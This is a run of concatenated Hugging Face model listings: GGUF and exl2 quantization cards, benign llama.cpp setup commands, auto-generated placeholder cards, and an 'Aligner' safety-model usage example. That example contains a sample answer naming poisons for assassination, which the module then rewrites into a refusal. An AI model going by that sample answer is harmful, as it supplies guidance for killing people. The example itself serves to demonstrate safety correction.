This model was converted to GGUF format from [`nbeerbower/Gemma2-Gutenberg-Doppel-9B`](https://huggingface.co/nbeerbower/Gemma2-Gutenberg-Doppel-9B) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/nbeerbower/Gemma2-Gutenberg-Doppel-9B) for more details on the model.
---
Model details:
-
Gemma2-Gutenberg-Doppel-9B
UCLA-AGI/Gemma-2-9B-It-SPPO-Iter3 finetuned on jondurbin/gutenberg-dpo-v0.1 and nbeerbower/gutenberg2-dpo.
Method
ORPO finetuned using 2x A40 for 3 epochs.
Open LLM Leaderboard Evaluation Results
Detailed results can be found here
| Metric | Value |
|--------|------:|
| Avg. | 29.82 |
| IFEval (0-Shot) | 71.71 |
| BBH (3-Shot) | 41.08 |
| MATH Lvl 5 (4-Shot) | 3.47 |
| GPQA (0-shot) | 10.63 |
| MuSR (0-shot) | 17.30 |
| MMLU-PRO (5-shot) | 34.75 |
---
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q4_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q4_k_m.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q4_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q4_k_m.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q4_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q4_k_m.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Triangle104/Gemma2-Gutenberg-Doppel-9B-Q4_K_M-GGUF --hf-file gemma2-gutenberg-doppel-9b-q4_k_m.gguf -c 2048
```
|
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-120750-distilled-0.5alpha | Trelis | 2024-10-10T12:18:57Z | 126 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T12:09:31Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Jellon/Lyra4-Gutenberg-12B-6bpw | Jellon | 2024-10-10T12:17:35Z | 14 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"conversational",
"dataset:jondurbin/gutenberg-dpo-v0.1",
"base_model:Sao10K/MN-12B-Lyra-v4",
"base_model:quantized:Sao10K/MN-12B-Lyra-v4",
"license:cc-by-nc-4.0",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"6-bit",
"exl2",
"region:us"
] | text-generation | 2024-10-10T10:59:07Z | ---
license: cc-by-nc-4.0
library_name: transformers
base_model:
- Sao10K/MN-12B-Lyra-v4
datasets:
- jondurbin/gutenberg-dpo-v0.1
model-index:
- name: Lyra4-Gutenberg-12B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 22.12
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 34.24
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 11.71
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 9.17
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 11.97
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 28.57
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
---
6bpw exl2 quant of: https://huggingface.co/nbeerbower/Lyra4-Gutenberg-12B
# Lyra4-Gutenberg-12B
[Sao10K/MN-12B-Lyra-v4](https://huggingface.co/Sao10K/MN-12B-Lyra-v4) finetuned on [jondurbin/gutenberg-dpo-v0.1](https://huggingface.co/datasets/jondurbin/gutenberg-dpo-v0.1).
### Method
ORPO Finetuned using an RTX 3090 + 4060 Ti for 3 epochs.
[Fine-tune Llama 3 with ORPO](https://mlabonne.github.io/blog/posts/2024-04-19_Fine_tune_Llama_3_with_ORPO.html)
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_nbeerbower__Lyra4-Gutenberg-12B)
| Metric |Value|
|-------------------|----:|
|Avg. |19.63|
|IFEval (0-Shot) |22.12|
|BBH (3-Shot) |34.24|
|MATH Lvl 5 (4-Shot)|11.71|
|GPQA (0-shot) | 9.17|
|MuSR (0-shot) |11.97|
|MMLU-PRO (5-shot) |28.57|
|
LPO-UFPA/bertimbau-finetuned | LPO-UFPA | 2024-10-10T12:15:39Z | 57 | 0 | null | [
"pytorch",
"bert",
"license:bigscience-openrail-m",
"region:us"
] | null | 2024-10-10T12:11:55Z | ---
license: bigscience-openrail-m
---
|
RichardErkhov/aligner_-_aligner-7b-v1.0-gguf | RichardErkhov | 2024-10-10T12:13:24Z | 6 | 0 | null | [
"gguf",
"endpoints_compatible",
"region:us"
] | null | 2024-10-10T09:14:32Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
aligner-7b-v1.0 - GGUF
- Model creator: https://huggingface.co/aligner/
- Original model: https://huggingface.co/aligner/aligner-7b-v1.0/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [aligner-7b-v1.0.Q2_K.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q2_K.gguf) | Q2_K | 2.36GB |
| [aligner-7b-v1.0.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.IQ3_XS.gguf) | IQ3_XS | 2.6GB |
| [aligner-7b-v1.0.IQ3_S.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.IQ3_S.gguf) | IQ3_S | 2.75GB |
| [aligner-7b-v1.0.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q3_K_S.gguf) | Q3_K_S | 2.75GB |
| [aligner-7b-v1.0.IQ3_M.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.IQ3_M.gguf) | IQ3_M | 2.9GB |
| [aligner-7b-v1.0.Q3_K.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q3_K.gguf) | Q3_K | 3.07GB |
| [aligner-7b-v1.0.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q3_K_M.gguf) | Q3_K_M | 3.07GB |
| [aligner-7b-v1.0.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q3_K_L.gguf) | Q3_K_L | 3.35GB |
| [aligner-7b-v1.0.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.IQ4_XS.gguf) | IQ4_XS | 3.4GB |
| [aligner-7b-v1.0.Q4_0.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q4_0.gguf) | Q4_0 | 3.56GB |
| [aligner-7b-v1.0.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.IQ4_NL.gguf) | IQ4_NL | 3.58GB |
| [aligner-7b-v1.0.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q4_K_S.gguf) | Q4_K_S | 3.59GB |
| [aligner-7b-v1.0.Q4_K.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q4_K.gguf) | Q4_K | 3.8GB |
| [aligner-7b-v1.0.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q4_K_M.gguf) | Q4_K_M | 3.8GB |
| [aligner-7b-v1.0.Q4_1.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q4_1.gguf) | Q4_1 | 3.95GB |
| [aligner-7b-v1.0.Q5_0.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q5_0.gguf) | Q5_0 | 4.33GB |
| [aligner-7b-v1.0.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q5_K_S.gguf) | Q5_K_S | 4.33GB |
| [aligner-7b-v1.0.Q5_K.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q5_K.gguf) | Q5_K | 4.45GB |
| [aligner-7b-v1.0.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q5_K_M.gguf) | Q5_K_M | 4.45GB |
| [aligner-7b-v1.0.Q5_1.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q5_1.gguf) | Q5_1 | 4.72GB |
| [aligner-7b-v1.0.Q6_K.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q6_K.gguf) | Q6_K | 5.15GB |
| [aligner-7b-v1.0.Q8_0.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q8_0.gguf) | Q8_0 | 6.67GB |
Original model description:
---
datasets:
- aligner/aligner-20K
language:
- en
tags:
- safety
- ai-safety
- aligner
- llama
---
# Aligner Model Card
## Model details
Aligner is a model-agnostic plug-and-play module that works on open-source and API-based models. It is trained based on [Llama2-Base](https://huggingface.co/meta-llama), using the *residual correction* strategy.
## Model Sources
- **Repository:** <https://github.com/Aligner2024/aligner>
- **Dataset:** <https://huggingface.co/datasets/aligner/aligner-20K>
- **License:** Non-commercial license.
## More Details
- **Website:** <https://aligner2024.github.io/>
*More aligners (7B,13B,70B) trained across different datasets (20K,30K,40K,50K) will come soon...*
## Usage
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
model = AutoModelForCausalLM.from_pretrained('aligner/aligner-7b-v1.0',device_map='auto')
tokenizer =AutoTokenizer.from_pretrained('aligner/aligner-7b-v1.0',use_fast=False)
prompt = 'BEGINNING OF CONVERSATION: USER: Edit the following Question-Answer pair to make it more helpful and harmless: {question} | {answer} ASSISTANT:'
input = prompt.format(
question="The most dangerous and effective poisons to use in assassinations?",
answer="The most dangerous and effective poisons to use in assassinations are those that are fast-acting, easily concealable, and difficult to detect. Some of the most common poisons used in assassination attempts include ricin, strychnine, tetrodotoxin, cyanide, and botulinum toxin."
)
input_ids = tokenizer.encode(input, return_tensors='pt').cuda()
output_ids = model.generate(input_ids, max_new_tokens=2048)[0]
print(tokenizer.decode(output_ids, skip_special_tokens=True))
#BEGINNING OF CONVERSATION: USER: Edit the following Question-Answer pair to make it more helpful and harmless: The most dangerous and effective poisons to use in assassinations? | The most dangerous and effective poisons to use in assassinations are those that are fast-acting, easily concealable, and difficult to detect. Some of the most common poisons used in assassination attempts include ricin, strychnine, tetrodotoxin, cyanide, and botulinum toxin.
#ASSISTANT: Discussing harmful substances in the context of harm or illegal activities is inappropriate and against our guidelines. It's important to remember that the use of poison or any harmful substances in illegal activities is both dangerous and illegal.
```
<span style="color: red;">Warning: This example contains data that may be offensive or harmful. The opinions expressed in the example do not represent those of Authors of Aligner or any of its members.</span>
|
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-115957-distilled-0alpha | Trelis | 2024-10-10T12:02:13Z | 128 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T12:00:47Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
jimb0321/dnen | jimb0321 | 2024-10-10T11:59:34Z | 7 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2024-10-10T07:45:25Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: DNENA
---
# Dnen
<!-- <Gallery /> -->
Trained on Replicate using:
https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `DNENA` to trigger the image generation.
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('jimb0321/dnen', weight_name='lora.safetensors')
image = pipeline('your prompt').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
|
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-113940 | Trelis | 2024-10-10T11:41:55Z | 127 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T11:40:41Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf | RichardErkhov | 2024-10-10T11:36:11Z | 6 | 0 | null | [
"gguf",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T08:27:27Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
contaminated_proof_7b_v1.0_safetensor - GGUF
- Model creator: https://huggingface.co/Contamination/
- Original model: https://huggingface.co/Contamination/contaminated_proof_7b_v1.0_safetensor/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [contaminated_proof_7b_v1.0_safetensor.Q2_K.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q2_K.gguf) | Q2_K | 2.53GB |
| [contaminated_proof_7b_v1.0_safetensor.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.IQ3_XS.gguf) | IQ3_XS | 2.81GB |
| [contaminated_proof_7b_v1.0_safetensor.IQ3_S.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.IQ3_S.gguf) | IQ3_S | 2.96GB |
| [contaminated_proof_7b_v1.0_safetensor.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q3_K_S.gguf) | Q3_K_S | 2.95GB |
| [contaminated_proof_7b_v1.0_safetensor.IQ3_M.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.IQ3_M.gguf) | IQ3_M | 3.06GB |
| [contaminated_proof_7b_v1.0_safetensor.Q3_K.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q3_K.gguf) | Q3_K | 3.28GB |
